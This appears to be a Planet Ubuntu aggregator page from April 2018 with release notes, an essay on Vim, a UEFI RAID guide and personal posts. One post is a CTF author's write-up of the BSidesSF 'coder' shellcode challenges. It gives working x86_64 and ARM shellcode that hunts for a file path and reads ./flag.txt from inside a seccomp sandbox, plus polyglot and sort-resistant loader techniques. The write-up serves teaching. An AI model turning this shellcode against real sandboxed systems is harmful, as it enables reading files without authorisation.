April 22, 2018

After 2.5 years of on-again/off-again development, a new stable release of MenuLibre is now available! This release includes a vast array of changes since 2.0.7 and is recommended for all users.

What’s New?

Since MenuLibre 2.0.7, the previous stable release.

General

  • Support for Budgie, Cinnamon, EDE, KDE Plasma, LXQt, MATE, and Pantheon desktop environments
  • Version 1.1 of the Desktop Entry specification is now supported
  • Improved KeyFile backend for better file support

New Features

  • Integrated window identification for the StartupWmClass key
  • New dialog and notification for reviewing invalid desktop entries
  • New button to test launchers without saving
  • New button to sort menu directory contents alphabetically
  • Subdirectories can now be added to preinstalled system paths
  • Menu updates are now delayed to prevent file writing collisions

Interface Updates

  • New layout preferences! Budgie, GNOME, and Pantheon utilize client side decorations (CSD) while other desktops continue to use server side decorations (SSD) with a toolbar and menu.
    • Want to switch? The -b and -t commandline flags allow you to set your preference.
  • Simplified and easier-to-use widgets for Name, Comment, DBusActivatable, Executable, Hidden, Icon, and Working Directory keys
  • Hidden items are now italicized in the treeview
  • Directories are now represented by the folder icon
  • Updated application icon

Downloads

Source tarball (md5, sig)

Available on Debian Testing/Unstable and Ubuntu 18.04 “Bionic Beaver”. Included in Xubuntu 18.04.

on April 22, 2018 11:08 AM

Mugshot, the simple user configuration utility, has hit a new stable milestone! Release 0.4.0 wraps up the 0.3 development cycle with full camera support for the past several years of GTK+ releases (and a number of other fixes).

What’s New?

Since Mugshot 0.2.5, the previous stable release.

  • Improved camera support, powered by Cheese and Clutter
  • AccountsService integration for more reliable user detail parsing
  • Numerous bug fixes with file access, parsing, and permissions
  • Translation updates for Brazilian Portuguese, Catalan, Croatian, Czech, Danish, Dutch, Finnish, French, German, Greek, Icelandic, Italian, Lithuanian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, and Swedish

Downloads

Source tarball (md5, sig)

Available in Debian Unstable and Ubuntu 18.04 “Bionic Beaver”. Included in Xubuntu 18.04.

on April 22, 2018 10:17 AM
The Release Candidate for Ubuntu Studio 18.04 is ready for testing. Download it here. There are some known issues:

  • Volume label still set to Beta
  • base-files still not the final version
  • kernel will have (at least) one more revision

Please report any bugs using ubuntu-bug {package name}. Final release is scheduled to be released on […]
on April 22, 2018 02:34 AM

Initial RC (Release Candidate) images for the Kubuntu Bionic Beaver (18.04) are now available for testing.

The Kubuntu team will be releasing 18.04 on 26 April. The final Release Candidate milestone is available today, 21 April.

This is the first spin of a release candidate in preparation for the RC milestone. If major bugs are encountered and fixed, the RC images may be respun.

Kubuntu Beta pre-releases are NOT recommended for:

  • Regular users who are not aware of pre-release issues
  • Anyone who needs a stable system
  • Anyone uncomfortable running a possibly frequently broken system
  • Anyone in a production environment with data or workflows that need to be reliable

Kubuntu Beta pre-releases are recommended for:

  • Regular users who want to help us test by finding, reporting, and/or fixing bugs
  • Kubuntu, KDE, and Qt developers

Getting Kubuntu 18.04 RC testing images:

To upgrade to Kubuntu 18.04 pre-releases from 17.10, run sudo do-release-upgrade -d from a command line.

Download a Bootable image and put it onto a DVD or USB Drive via the download link at

http://iso.qa.ubuntu.com/qatracker/milestones/389/builds

This is also the direct link to report your findings and any bug reports you file.

See our release notes: https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes/Kubuntu

Please report your results on the Release tracker.

on April 22, 2018 01:13 AM

Vim is an improved version of Vi, a well-known text editor available by default in UNIX distributions. The other big name among alternatives is Emacs, but the two are so different that I kind of feel they serve different purposes. Both are great, regardless.

I don’t think Vim is necessarily an acquired, geeky taste. Vim introduced me to modal editing, and that has really changed my life. If you have ever tried Vim, you may have noticed you have to press “i” or “a” (lower case) to start writing (note: I’m aware there are more ways to start editing, but the purpose here is not to cover all of Vim’s functionality). The fun part starts once you realize you can associate those keys with the Insert and Append commands. Editing text then becomes a matter of thinking about what you want the computer to show on the screen, instead of struggling with where you are before you start writing. The same goes for other commands, which convert easily into mnemonics, and this is what helped me get comfortable with Vim. Note that Emacs does not have this kind of keybinding by default, but it does have a Vim-like mode - Evil (Extensible Vi Layer). More often than not, I just need to think of what I want to accomplish and type the first letters: Replace, Visual, Delete, and so on. It is a modal editor after all, meaning it has a mode for everything. This is also what increases my productivity when writing files. I just think of my intention and Vim does the rest for me.

Here’s another cool example. Imagine this Python line (do not fear, this is not a coding post):

def function(aParameterThatChanged)

In a non-modal text editor, you would need to pick up your mouse, carefully select the text inside the parentheses (you might be able to double-click the text to highlight it) and then delete it, type over it, etc. In Vim, there are basically two ways to do that. You can type di( and that will delete inside the symbol you typed. How helpful is that? Want to blow your mind? Typing ci( will change inside the symbol, deleting the contents and switching to insert mode automatically.

Vim has a significant learning curve, I’m aware of that. Many people get discouraged on the first try, but sticking with Vim has changed how I perceive text writing and I know, for sure, it has been a positive change. I write faster, editing is instant, I don’t need the mouse for anything at all, Vim starts instantly, and there are many other cool features. For those looking for customization, Vim is fully customizable without putting much of a load on your CPU, unlike Atom. Vim is also easily accessible anywhere. Take IntelliJ, for example, a multi-platform Java IDE. It even recommends installing the Vim plugin right after the installation process. Obviously, I did. And in a UNIX terminal, Vim comes by default.

I just wanted to praise modal editing, more than Vim itself, although the tool is amazing. I believe everyone should know Vim. It is simpler than Emacs, has lots of potential and it can make you more productive. But it is modal editing that got me addicted. I can’t install an IDE without looking for Vim extensions.

I would like everyone to try Vi’s modal editing. It will change your life, I assure you, despite requiring a bit of time in the beginning. If you ever get stuck, just Google your problem and I’m 150% positive you will find an answer. As time goes by, I’m positive you will discover features of Vim you didn’t even know were possible.

Thanks for reading.

gsilvapt

on April 22, 2018 12:00 AM

April 21, 2018

Mako Hate

Benjamin Mako Hill

I recently discovered a prolific and sustained community of meme-makers on Tumblr dedicated to expressing their strong dislike for “Mako.”

Two tags with examples are #mako hate and #anti mako but there are many others.

“even Mako hates Mako…” meme. Found on this forum thread.

I’ve also discovered Tumblrs entirely dedicated to the topic!

For example, Let’s Roast Mako describes itself as “A place to beat up Mako. In peace. It’s an inspiration to everyone!”

The second is the Fuck Mako Blog, which describes itself with a series of tag-lines including “Mako can fuck right off and we’re really not sorry about that,” “Welcome aboard the SS Fuck-Mako;” and “Because Mako is unnecessary.” Sub-pages of the site include:

I’ll admit I’m a little disquieted.

on April 21, 2018 09:31 PM

Introduction

As the author of the “coder” series of challenges (Intel Coder, ARM Coder, Poly Coder, and OCD Coder) in the recent BSidesSF CTF, I wanted to share my perspective on the challenges. I can’t tell if the challenges were uninteresting, too hard, or both, but they were solved by far fewer teams than I had expected (and far fewer than we had assumed when assigning point values to them).

The entire series of challenges was based on the premise “give me your shellcode and I’ll run it”, but with some limitations. Rather than forcing players to find and exploit a vulnerability, we wanted to teach players about dealing with restricted environments like sandboxes, unusual architectures, and situations where your shellcode might be manipulated by the process before it runs.

Overview

Each challenge requested the length of your shellcode followed by the shellcode and allowed for ~1k of shellcode (which is more than enough for any reasonable exploitation effort on these). Shellcode was placed into newly-allocated memory with RWX permissions, with a guard page above and below. A new stack was allocated similarly, but without the execute bit set.
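
For a concrete picture, here is a rough sketch (my own illustration, not the challenge source) of how such a staging area could be set up with mmap() and mprotect(): an RWX region sandwiched between two inaccessible guard pages.

/* Sketch only: guard page + RWX body + guard page in one mapping. */
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

#define PAGE 4096UL

void *alloc_shellcode_region(size_t len)
{
    size_t body = (len + PAGE - 1) & ~(PAGE - 1);   /* round up to whole pages */
    uint8_t *base = mmap(NULL, body + 2 * PAGE, PROT_NONE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return NULL;
    /* only the middle of the mapping becomes readable/writable/executable */
    if (mprotect(base + PAGE, body, PROT_READ | PROT_WRITE | PROT_EXEC) != 0)
        return NULL;
    return base + PAGE;   /* the player's shellcode gets copied here */
}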

Each challenge had a seccomp-bpf sandbox set up, with slight variations in the limitations of the sandbox to encourage players to look into how the sandbox is created:

  • All challenges allowed rt_sigreturn(), exit(), exit_group() and close() for housekeeping purposes.
  • Intel Coder allowed open() (with limited arguments) and sendfile().
  • ARM Coder allowed open(), read(), and write(), all with limited arguments.
  • Poly Coder allowed read() and write(), but the file descriptors were already opened for the player.
  • OCD Coder allowed open(), read(), write() and sendfile() with restrictions.

The shellcode was then executed by a helper function written in assembly, which swapped in the new stack and then jumped to the shellcode.

There were a few things that made these challenges harder than they might have otherwise been:

  • Stripped binaries
  • PIE binaries and ASLR
  • Statically linking libseccomp (although I thought I was doing players a favor with this, it does make the binary much larger)

A Seccomp Primer

Seccomp initially was a single system call that limited the calling thread to use a small subset of syscalls. seccomp-bpf extended this to use Berkeley Packet Filters (BPF) to allow for filtering system calls. The system call number and arguments (from registers) are placed into a structure, and the BPF is used to filter this structure. The filter can result in allowing or denying the syscall, and on a denied syscall, an error may be returned, a signal may be delivered to the calling thread, or the thread may be killed.

Because all of the registers are included in the structure, seccomp-bpf allows for filtering not only based on the system call itself, but on the arguments passed to the system call. One quirk of this is that it is completely unaware of the types of the arguments, and only operates on the contents of the registers used for passing arguments. Consequently, pointer types are compared by the pointer value and not by the contents pointed to. I actually hadn’t thought about this before writing this challenge and limiting the values passed to open(). All of the challenges allowing open limited it to ./flag.txt, so not only could you only open that one file, you could only do it by using the same pointer that was passed to the library functions that set up the filtering.

An interesting corollary is that if you limit system call arguments by passing in a pointer value, you probably want it to be a global, and you probably don’t want it to be in writable memory, so that an attacker can’t overwrite the desired string and still pass the same pointer.
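
To make that concrete, here is a minimal libseccomp sketch (my own illustration, not the actual challenge code) where open() is only allowed when its first argument equals one specific pointer and its second argument is 0 (O_RDONLY); the comparison is on the pointer value itself, exactly as described above.

/* Sketch only: kill by default, allow open() for a single pointer value.
 * Build with -lseccomp. */
#include <stdint.h>
#include <seccomp.h>

static const char flag_path[] = "./flag.txt";

int install_filter(void)
{
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);   /* default action: kill */
    if (ctx == NULL)
        return -1;
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
    /* open() passes only if args[0] is exactly &flag_path and args[1] is 0 (O_RDONLY) */
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 2,
                     SCMP_A0(SCMP_CMP_EQ, (scmp_datum_t)(uintptr_t)flag_path),
                     SCMP_A1(SCMP_CMP_EQ, 0));
    return seccomp_load(ctx);
}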

Reverse Engineering the Sandbox

There’s a wonderful toolset called seccomp-tools that provides the ability to dump the BPF structure from the process as it runs by using ptrace(). If we run the Intel coder binary under seccomp-tools, we’ll see the following structure:

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x11 0xc000003e  if (A != ARCH_X86_64) goto 0019
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x0f 0x00 0x40000000  if (A >= 0x40000000) goto 0019
 0004: 0x15 0x0d 0x00 0x00000003  if (A == close) goto 0018
 0005: 0x15 0x0c 0x00 0x0000000f  if (A == rt_sigreturn) goto 0018
 0006: 0x15 0x0b 0x00 0x00000028  if (A == sendfile) goto 0018
 0007: 0x15 0x0a 0x00 0x0000003c  if (A == exit) goto 0018
 0008: 0x15 0x09 0x00 0x000000e7  if (A == exit_group) goto 0018
 0009: 0x15 0x00 0x09 0x00000002  if (A != open) goto 0019
 0010: 0x20 0x00 0x00 0x00000014  A = args[0] >> 32
 0011: 0x15 0x00 0x07 0x00005647  if (A != 0x5647) goto 0019
 0012: 0x20 0x00 0x00 0x00000010  A = args[0]
 0013: 0x15 0x00 0x05 0x8bd01428  if (A != 0x8bd01428) goto 0019
 0014: 0x20 0x00 0x00 0x0000001c  A = args[1] >> 32
 0015: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0019
 0016: 0x20 0x00 0x00 0x00000018  A = args[1]
 0017: 0x15 0x00 0x01 0x00000000  if (A != 0x0) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x06 0x00 0x00 0x00000000  return KILL

The first two lines check the architecture of the running binary (presumably because the system call numbers are architecture-dependent). The filter then loads the system call number to determine the behavior for each syscall. Lines 0004 through 0008 are syscalls that are allowed unconditionally. Line 0009 ensures that anything but the already-allowed syscalls or open() results in killing the process.

Lines 0010-0017 check the arguments passed to open(). Since the BPF can only compare 32 bits at a time, the 64-bit registers are split in two with shifts. The first few lines ensure that the filename string (args[0]) is a pointer with value 0x56478bd01428. Of course, due to ASLR, you’ll find that this value varies with each execution of the program, so no hard coding your pointer values here! Finally, it checks that the second argument (args[1]) to open() is 0x0, which corresponds to O_RDONLY. (No opening the flag for writing!)

seccomp-tools really makes this so much easier than manual reversing would be.

Solving Intel & ARM Coder

The solutions for both Intel Coder and ARM Coder are very similar. First, let’s determine the steps we need to undertake:

  1. Locate the ./flag.txt string that was used in the seccomp-bpf filter.
  2. Open ./flag.txt.
  3. Read the file and send the contents to the player. (sendfile() on Intel, read() and write() on ARM)

In order to not be a total jerk in these challenges, I ensured that one of the registers contained a value somewhere in the .text section of the binary, to make it somewhat easier to hunt for the ./flag.txt string. (This was actually always the address of the function that executed the player shellcode.) Consequently, finding the string should have been trivial using the commonly known egghunter techniques.

At this point, it’s basically just a straightforward shellcode to open() the file and send its contents. The entirety of my example solution for Intel Coder is:

BITS 64

; hunt for string based on rdx
hunt:
add rdx, 0x4
mov rax, 0x742e67616c662f2e   ; ./flag.t
cmp rax, [rdx]
jne hunt

xor rax, rax
mov rdi, rdx              ; path
xor rax, rax
mov al, 2                 ; rax for SYS_open
xor rdx, rdx              ; mode
xor rsi, rsi              ; flags
syscall

xor rdi, rdi
inc rdi                   ; out_fd
mov rsi, rax              ; in_fd from open
xor rdx, rdx              ; offset
mov r10, 0xFF             ; count
mov rax, 40               ; SYS_sendfile
syscall

xor rax, rax
mov al, 60                ; SYS_exit
xor rdi, rdi              ; code
syscall

For ARM coder, the solution is much the same, except using read() and write() instead of sendfile().

.section .text
.global shellcode
.arm

shellcode:
  # r0 = my shellcode
  # r1 = new stack
  # r2 = some pointer

  # load ./fl into r3
  MOVW r3, #0x2f2e
  MOVT r3, #0x6c66
  # load ag.t into r4
  MOVW r4, #0x6761
  MOVT r4, #0x742e
hunt:
  LDR r5, [r2, #0x4]!
  TEQ r5, r3
  BNE hunt
  LDR r5, [r2, #0x4]
  TEQ r5, r4
  BNE hunt
  # r2 should now have the address of ./flag.txt

  # SYS_open
  MOVW r7, #5
  MOV r0, r2
  MOVW r1, #0
  MOVW r2, #0
  SWI #0

  # SYS_read
  MOVW r7, #3
  MOV r1, sp
  MOV r2, #0xFF
  SWI #0

  # SYS_write
  MOVW r7, #4
  MOV r2, r0
  MOV r1, sp
  MOVW r0, #1
  SWI #0

  # SYS_exit
  MOVW r7, #1
  MOVW r0, #0
  SWI #0

Poly Coder

Poly Coder was actually not very difficult if you had solved both of the above challenges. It required only reading from an already open FD and writing to an already open FD. You did have to search through the FDs to find which were open, but this was easy, as any that were not open would return -1, so all that was required was looping until a read/write returned more than 0 bytes.

To produce shellcode that ran on both architectures, you could use an instruction that was a jump in one architecture and benign in the other. One such example is EB 7F 00 32, which is a jmp 0x7F in x86_64, but does some AND operation on r0 in ARM. Prefixing your shellcode with that, followed by up to 120 bytes of ARM shellcode, then a few bytes of padding, and the x86_64 shellcode at the end would work.
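
As a rough sketch (the offsets and helper here are my own, derived from the 0x7f displacement of that jump, not the exact layout used in the CTF), a builder for such a payload might look like this:

/* Sketch only: the 4-byte stub is a short jmp on x86_64 and a harmless
 * data-processing instruction on ARM, so each CPU runs its own half. */
#include <stddef.h>
#include <string.h>

#define X86_ENTRY (2 + 0x7f)   /* jmp rel8 lands 0x7f bytes past its own 2-byte encoding */

size_t build_polyglot(unsigned char *out, size_t out_len,
                      const unsigned char *arm, size_t arm_len,
                      const unsigned char *x86, size_t x86_len)
{
    static const unsigned char stub[4] = { 0xEB, 0x7F, 0x00, 0x32 };
    if (arm_len > X86_ENTRY - sizeof(stub) || X86_ENTRY + x86_len > out_len)
        return 0;
    memset(out, 0x00, X86_ENTRY);               /* padding between the two halves */
    memcpy(out, stub, sizeof(stub));            /* ARM executes this and falls through */
    memcpy(out + sizeof(stub), arm, arm_len);   /* ARM shellcode */
    memcpy(out + X86_ENTRY, x86, x86_len);      /* x86_64 shellcode (the jmp target) */
    return X86_ENTRY + x86_len;
}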

OCD Coder

As I recall it, one of the other members of our CTF organizing team joked “we should sort their shellcode before we run it.” While intended as a joke, I took this as a challenge and began work to see if this was solvable. Obviously, the smaller the granularity (e.g., sorting by byte) the more difficult this becomes. I settled on trying to find a solution where it was sorted by 32-bit (DWORD) chunks, and found one with about 2 hours of effort.

Rather than try to write the entire shellcode in something that would sort correctly, I wrote a small loader that was manually tweaked to sort. This loader would then take the following shellcode and extract the lower 3 bytes of each DWORD and concatenate them. In this way, I could force ordering by inserting a one-byte tag at the most significant position of each 3 byte chunk.

It looks something like this:

[tag][3 bytes shellcode]
[tag][3 bytes shellcode]
[tag][3 bytes shellcode]

...

[3 bytes shellcode][3 by
tes shellcode][3 bytes s
hellcode]
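
A hypothetical packer for that layout (my own sketch; the nop padding and exact tag handling are assumptions) places an increasing tag as the fourth byte of each little-endian DWORD - its most significant byte - so sorting the DWORDs leaves the 3-byte chunks in their original order:

/* Sketch only: wrap each 3-byte chunk of shellcode in a tagged DWORD. */
#include <stddef.h>

size_t pack_sorted(unsigned char *out, const unsigned char *code, size_t len)
{
    size_t j = 0;
    unsigned char tag = 1;
    for (size_t i = 0; i < len; i += 3, tag++) {
        out[j++] = code[i];                               /* low three bytes: payload */
        out[j++] = (i + 1 < len) ? code[i + 1] : 0x90;    /* pad a short tail with nops */
        out[j++] = (i + 2 < len) ? code[i + 2] : 0x90;
        out[j++] = tag;   /* MSB of the little-endian DWORD: dominates the sort order */
    }
    return j;
}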

The loader is as simple as this:

BITS 32

# assumes shellcode @eax
mov ecx, 0x24
and eax, eax
add eax, ecx
mov ebx, eax
inc edx
loop:
  mov edx, [eax]
  nop
  add eax, 4
  nop
  mov [ebx], edx
  inc ebx
  inc ebx
  nop
  inc ebx
  nop
  nop
  nop
  dec ecx
  nop
  nop
  nop
  jnz loop
nop

The large number of nops was necessary to get the loader to sort properly, as were tricks like using 3 inc ebx instructions instead of add ebx, 3. There are even trash instructions like inc edx that have no effect on the output, but serve just to get the shellcode to sort the way I needed. The x86 opcode reference was incredibly useful in finding bytes with the desired value to make things work.

I have no doubt there are shorter or more efficient solutions, but this got the job done.

Conclusion

We’ll soon be releasing the source code to all of the challenges, so you can see the details of how this was all put together, but I wanted to share my insight into the challenges from the author’s point of view. Hopefully those that did solve it (or tried to solve it) had a good time doing so or learned something new.

on April 21, 2018 07:00 AM

April 20, 2018

Hyak on Hyak

Benjamin Mako Hill

I recently fulfilled a yearslong dream of launching a job on Hyak* on Hyak.

Hyak on Hyak

 


* Hyak is the University of Washington’s supercomputer which my research group uses for most of our computation-intensive research.
M/V Hyak is a Super-class ferry operated by the Washington State Ferry System.
on April 20, 2018 10:26 PM
Yes! Everything is ready for the upcoming UbuCon Europe 2018 in Xixón! 😃

We'll have an awesome weekend of conferences (with 4 parallel talks), podcasts, stands, social events... Most of them are in English, but there will be some in Spanish & Asturian too.

\o/
The speakers are coming from all these countries:

\o/


Are you ready for an incredible UbuCon? :)

Testing the Main Room #noedits
Remember that you have transport discounts and a main social event: the espicha.

See you in Xixón! ❤

+ info
on April 20, 2018 03:56 PM

I spent some time yesterday building out a UEFI server that didn’t have on-board hardware RAID for its system drives. In these situations, I always use Linux’s md RAID1 for the root filesystem (and/or /boot). This worked well for BIOS booting since BIOS just transfers control blindly to the MBR of whatever disk it sees (modulo finding a “bootable partition” flag, etc, etc). This means that BIOS doesn’t really care what’s on the drive, it’ll hand over control to the GRUB code in the MBR.

With UEFI, the boot firmware is actually examining the GPT partition table, looking for the partition marked with the “EFI System Partition” (ESP) UUID. Then it looks for a FAT32 filesystem there, and does more things like looking at NVRAM boot entries, or just running EFI/BOOT/BOOTX64.EFI from the FAT32. Under Linux, this .EFI code is either GRUB itself, or Shim which loads GRUB.

So, if I want RAID1 for my root filesystem, that’s fine (GRUB will read md, LVM, etc), but how do I handle /boot/efi (the UEFI ESP)? In everything I found answering this question, the answer was “oh, just manually make an ESP on each drive in your RAID and copy the files around, add a separate NVRAM entry (with efibootmgr) for each drive, and you’re fine!” I did not like this one bit since it meant things could get out of sync between the copies, etc.

The current implementation of Linux’s md RAID puts metadata at the front of a partition. This solves more problems than it creates, but it means the RAID isn’t “invisible” to something that doesn’t know about the metadata. In fact, mdadm warns about this pretty loudly:

# mdadm --create /dev/md0 --level 1 --raid-disks 2 /dev/sda1 /dev/sdb1
mdadm: Note: this array has metadata at the start and
    may not be suitable as a boot device.  If you plan to
    store '/boot' on this device please ensure that
    your boot-loader understands md/v1.x metadata, or use
    --metadata=0.90

Reading from the mdadm man page:

-e, --metadata=
    ...
    1, 1.0, 1.1, 1.2 default
        Use the new version-1 format superblock. This has fewer
        restrictions. It can easily be moved between hosts with
        different endian-ness, and a recovery operation can be
        checkpointed and restarted. The different sub-versions store
        the superblock at different locations on the device, either at
        the end (for 1.0), at the start (for 1.1) or 4K from the start
        (for 1.2). "1" is equivalent to "1.2" (the commonly preferred
        1.x format). "default" is equivalent to "1.2".

First we toss a FAT32 on the RAID (mkfs.fat -F32 /dev/md0), and looking at the results, the first 4K is entirely zeros, and file doesn’t see a filesystem:

# dd if=/dev/sda1 bs=1K count=5 status=none | hexdump -C
00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000  fc 4e 2b a9 01 00 00 00  00 00 00 00 00 00 00 00  |.N+.............|
...
# file -s /dev/sda1
/dev/sda1: Linux Software RAID version 1.2 ...

So, instead, we’ll use --metadata 1.0 to put the RAID metadata at the end:

# mdadm --create /dev/md0 --level 1 --raid-disks 2 --metadata 1.0 /dev/sda1 /dev/sdb1
...
# mkfs.fat -F32 /dev/md0
# dd if=/dev/sda1 bs=1 skip=80 count=16 status=none | xxd
00000000: 2020 4641 5433 3220 2020 0e1f be77 7cac    FAT32   ...w|.
# file -s /dev/sda1
/dev/sda1: ... FAT (32 bit)

Now we have a visible FAT32 filesystem on the ESP. UEFI should be able to boot whatever disk hasn’t failed, and grub-install will write to the RAID mounted at /boot/efi.

However, we’re left with a new problem: on (at least) Debian and Ubuntu, grub-install attempts to run efibootmgr to record which disk UEFI should boot from. This fails, though, since it expects a single disk, not a RAID set. In fact, it returns nothing, and tries to run efibootmgr with an empty -d argument:

Installing for x86_64-efi platform.
efibootmgr: option requires an argument -- 'd'
...
grub-install: error: efibootmgr failed to register the boot entry: Operation not permitted.
Failed: grub-install --target=x86_64-efi
WARNING: Bootloader is not properly installed, system may not be bootable

Luckily my UEFI boots without NVRAM entries, and I can disable the NVRAM writing via the “Update NVRAM variables to automatically boot into Debian?” debconf prompt when running: dpkg-reconfigure -p low grub-efi-amd64

So, now my system will boot with both or either drive present, and updates from Linux to /boot/efi are visible on all RAID members at boot-time. HOWEVER there is one nasty risk with this setup: if UEFI writes anything to one of the drives (which this firmware did when it wrote out a “boot variable cache” file), it may lead to corrupted results once Linux mounts the RAID (since the member drives won’t have identical block-level copies of the FAT32 any more).

To deal with this “external write” situation, I see some solutions:

  • Make the partition read-only when not under Linux. (I don’t think this is a thing.)
  • Add higher-level knowledge of the root-filesystem RAID configuration so that a collection of filesystems is kept manually synchronized instead of doing block-level RAID. (Seems like a lot of work and would need redesign of /boot/efi into something like /boot/efi/booted, /boot/efi/spare1, /boot/efi/spare2, etc)
  • Prefer one RAID member’s copy of /boot/efi and rebuild the RAID at every boot. If there were no external writes, there’s no issue. (Though what’s really the right way to pick the copy to prefer?)

Since mdadm has the “--update=resync” assembly option, I can actually do the latter option. This required updating /etc/mdadm/mdadm.conf to add <ignore> on the RAID’s ARRAY line to keep it from auto-starting:

ARRAY <ignore> metadata=1.0 UUID=123...

(Since it’s ignored, I’ve chosen /dev/md100 for the manual assembly below.) Then I added the noauto option to the /boot/efi entry in /etc/fstab:

/dev/md100 /boot/efi vfat noauto,defaults 0 0

And finally I added a systemd oneshot service that assembles the RAID with resync and mounts it:

[Unit]
Description=Resync /boot/efi RAID
DefaultDependencies=no
After=local-fs.target

[Service]
Type=oneshot
ExecStart=/sbin/mdadm -A /dev/md100 --uuid=123... --update=resync
ExecStart=/bin/mount /boot/efi
RemainAfterExit=yes

[Install]
WantedBy=sysinit.target

(And don’t forget to run “update-initramfs -u” so the initramfs has an updated copy of /etc/mdadm/mdadm.conf.)

If mdadm.conf supported an “update=” option for ARRAY lines, this would have been trivial. Looking at the source, though, that kind of change doesn’t look easy. I can dream!

And if I wanted to keep a “pristine” version of /boot/efi that UEFI couldn’t update I could rearrange things more dramatically to keep the primary RAID member as a loopback device on a file in the root filesystem (e.g. /boot/efi.img). This would make all external changes in the real ESPs disappear after resync. Something like:

# truncate --size 512M /boot/efi.img
# losetup -f --show /boot/efi.img
/dev/loop0
# mdadm --create /dev/md100 --level 1 --raid-disks 3 --metadata 1.0 /dev/loop0 /dev/sda1 /dev/sdb1

And at boot just rebuild it from /dev/loop0, though I’m not sure how to “prefer” that partition…

© 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

on April 20, 2018 12:34 AM

April 19, 2018

Diversity Update

Rhonda D'Vine

I have to apologize for being silent for so long. Way too many things happened. In fact I already wrote most of this last fall, but then something happened that impacted me too much to finalize this entry. And with that I want to go into a bit of detail about how I write my blog entries:
I start writing them in English, I like to cross-reference things, and after I'm done I go over it and write it again in German. That process helps me proofread the English part, but it also means that it takes a fair amount of time. And the longer the entries get, the more energy the translation and proofreading parts take, too. That's mostly also the reason why I tend to write longer entries when I find the energy and time for it.

Anyway, the first thing that I want to mention here finally happened last June: I officially got my name and gender/sex marker changed in my papers! That was a very happy moment in so many ways. A week later I got my new passport, and finally managed to book my flight to Debconf in my name. Yay me, I exist!

Then, Stretch was released. I have to admit I had very little to do, wasn't involved in the release process, neither from the website team nor anywhere else because ...

... because I was packing my stuff that weekend, because on June 21st a second thing finally happened: I got the keys to my flat in the Que[e]rbau!! Yes, I'm aware that we still need to work on the website. The building company actually made a big event out of it, called every single person onto the stage and handed over the keys. And it made me happy to be able to receive my key in my name and not one I haven't related to for a long while now. It did hurt seeing that happen to someone else from our house, even though they knew what the Que[e]rbau is about ... And: I moved in right that same day. I gave up my old flat the following week, even though I didn't have much furniture or a kitchen yet, because I had waited way too long to not be there. And just watch that sunset from my balcony. <3

And as I mentioned in the last blog post already, organizing the European Lesbian* Conference needed more and more work, too. The program for it was being finalized, but there were still more than enough things to do. I totally fell into this; it was the first time I really felt what intersectionality means and that it's not just a label but an internal part of this conference. The energy in the team on that front is really outstanding, and I'm totally happy to be part of this effort.

And then came Debconf17 in Montreal. It was nice to be with a fair number of people who have grown on me like family over the years. And interestingly I got notice that there was a Trans March going on, so I joined it. It was a pleasure meeting Sophie LaBelle and Chase Ross there. I wasn't aware that Chase was from Montreal, so that part was a surprise. Sophie I knew, and I brought her back to Vienna in November, right before the Transgender Day of Remembrance. :)

But one of the two moving speeches at the march was from Charlie Rose, titled My Gender Is Black. I managed to get a recording of this and of another great speech from another Black Lives Matter activist, and hope I'll be able to put them online at some point. For the time being the link to the text should help.

And then Debconf itself started. And I held the Debian Diversity Round Table. While the title might have been misleading, because this group isn't officially formed yet, it turned out to get a fair amount of interest. I started off with why I called for it, and that I intentionally chose not to have it videotaped so people would be able to speak more freely, and after a short introduction round with names, pronouns and other things people wanted to share, we had some interesting discussions on why people think this is a good idea and what direction to move in. A few ideas did spring up, and then ... time ran out. So we scheduled a continuation BoF to further develop the topic. At the end of that we came up with a pretty good consensual view on how to move forward. Unfortunately I haven't yet managed to follow up on that and feel quite bad about it. :/

Because, after returning, getting back into work, and needing a bit more time for EL*C, I started to feel serious pain in my back and my leg, which seems to be a slipped disc, and I was on sick leave for about two months. The pain was too much; I even had to stay at the hospital for two weeks because my stomach acted up too.

At the end of October we had a grand opening: we have a community space in our Que[e]rbau in which we built a sort of bar, with a cooking facility and hi-fi equipment. And we intentionally opened it up to the public. Its name is Yella Yella! Nachbar_innentreff. We named it after Yella Hertzka, who was an important feminist at the start of the 20th century. The park on the other side of the street is called Yella Hertzka park, so the pun in the name, with the connection to the Arabic expression Yalla Yalla, is intentional.

With the Yella Yella a fair amount of internal discussion emerged; we had all only just started to live together, so naturally this took a fair amount of energy and discussion. It takes time to get a feeling for all the people. There were several interviews, and events to organize to get it running.

And then all of a sudden it was 2018 and I still hadn't published this post. I'm sorry 'bout that, but sometimes there are other things needing time. And here I am. Time moves on even if we don't look at it.

A recent project that I had the honor to be part of is my movement is limitless [trans_non-binary short]. It was interesting to think about whether gender identity affects the way you dance, and to see and hear other people's approaches to it.

At the upcoming Linuxtage Graz there will be a session about Common misconceptions about names and spaces and communities, because they were enforcing a realname policy – at a community event. Not only is this a huge issue for trans people, but it also works against privacy researchers or people from the community whom no one really knows by the name in their papers. The discussions that happened on Twitter or in the background were partly quite disturbing. Let's hope that we'll manage to make a good panel.

Which brings us to a panel for the upcoming Debconf in Taiwan. There is a suggestion to have a Gender Forum at the Openday. I'm still not completely sure what it should cover or what is expected of it, and I guess it's still open for suggestions. There will be a plan; let's see to it that it's diverse and great!

I won't promise to send the next update sooner, but I'll try to get back into it. Right now I'm also working on a (German language) submission for a non-binary YouTube project and it would be great to see that thing lift off. I'll be more verbose on that front.

Thanks for reading so far, and read you soon. :)

/personal | permanent link | Comments: 0 | Flattr this

on April 19, 2018 07:53 PM

Interviewing people behind communitheme. Today: Frederik

